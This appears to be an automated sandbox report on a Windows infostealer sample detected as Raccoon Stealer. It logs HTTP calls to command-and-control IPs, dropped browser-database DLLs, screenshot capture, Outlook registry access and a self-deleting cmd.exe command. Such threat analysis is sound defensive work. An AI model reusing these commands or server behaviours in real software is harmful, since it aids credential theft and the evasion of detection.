Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp String found in binary or memory: http://194.180.174.182/
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp String found in binary or memory: http://194.180.174.182/2
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp String found in binary or memory: http://194.180.174.182/Square150x150.pngY
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp String found in binary or memory: http://194.180.174.182/l
Source: softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.1.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.1.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: softokn3.dll.1.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.1.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://ocsp.accv.es0
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://repository.swisssign.com/0
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3.dll.1.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.1.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nssckbi.dll.1.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.1.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: KqxsoH2Rhn.exe, 00000001.00000003.326081764.000000004DC01000.00000004.00000010.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: KqxsoH2Rhn.exe, 00000001.00000003.326081764.000000004DC01000.00000004.00000010.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: nssckbi.dll.1.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.1.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: softokn3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.182
Source: global traffic HTTP traffic detected: GET /rino115sipsip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.47.176
Source: global traffic HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/e2fece3ec028ffea81a6e29ab137c790945d5c2c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182
Source: global traffic HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/553beaf07e7bcfa31cdc14361c20d4ecff5638ed HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00429913 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 1_2_00429913

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.378040707.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.377370731.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.283534842.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KqxsoH2Rhn.exe PID: 6984, type: MEMORYSTR

System Summary:

barindex
Uses 32bit PE files
Source: KqxsoH2Rhn.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Detected potential crypto function
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004362A1 1_2_004362A1
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004103F7 1_2_004103F7
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041E6DA 1_2_0041E6DA
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040E727 1_2_0040E727
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00410AD2 1_2_00410AD2
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00434CB5 1_2_00434CB5
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0043CD97 1_2_0043CD97
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041D364 1_2_0041D364
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040D560 1_2_0040D560
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040F78B 1_2_0040F78B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00415816 1_2_00415816
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00427AAA 1_2_00427AAA
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00429B40 1_2_00429B40
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040DC7B 1_2_0040DC7B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041DD0B 1_2_0041DD0B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00435E43 1_2_00435E43
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0044C1E6 1_2_0044C1E6
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0043C20A 1_2_0043C20A
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041C217 1_2_0041C217
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0042035B 1_2_0042035B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0044C443 1_2_0044C443
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004185E7 1_2_004185E7
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0042862C 1_2_0042862C
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00486870 1_2_00486870
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: String function: 00466770 appears 100 times
PE file does not import any functions
Source: api-ms-win-core-handle-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: KqxsoH2Rhn.exe, 00000001.00000003.370376940.000000004DC97000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs KqxsoH2Rhn.exe
Source: KqxsoH2Rhn.exe, 00000001.00000002.378944844.000000006EC1B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs KqxsoH2Rhn.exe
Source: KqxsoH2Rhn.exe, 00000001.00000002.379036521.000000006FB12000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs KqxsoH2Rhn.exe
PE file contains more sections than normal
Source: sqlite3.dll.1.dr Static PE information: Number of sections : 18 > 10
Source: KqxsoH2Rhn.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: KqxsoH2Rhn.exe Virustotal: Detection: 35%
Source: KqxsoH2Rhn.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\KqxsoH2Rhn.exe "C:\Users\user\Desktop\KqxsoH2Rhn.exe"
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/69@0/4
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004279D5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 1_2_004279D5
Source: softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: KqxsoH2Rhn.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_01
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Mutant created: \Sessions\1\BaseNamedObjects\useriZ5i-O1fR-8gT0
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Command line argument: NaF 1_2_004660A0
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: KqxsoH2Rhn.exe, 00000001.00000003.370376940.000000004DC97000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
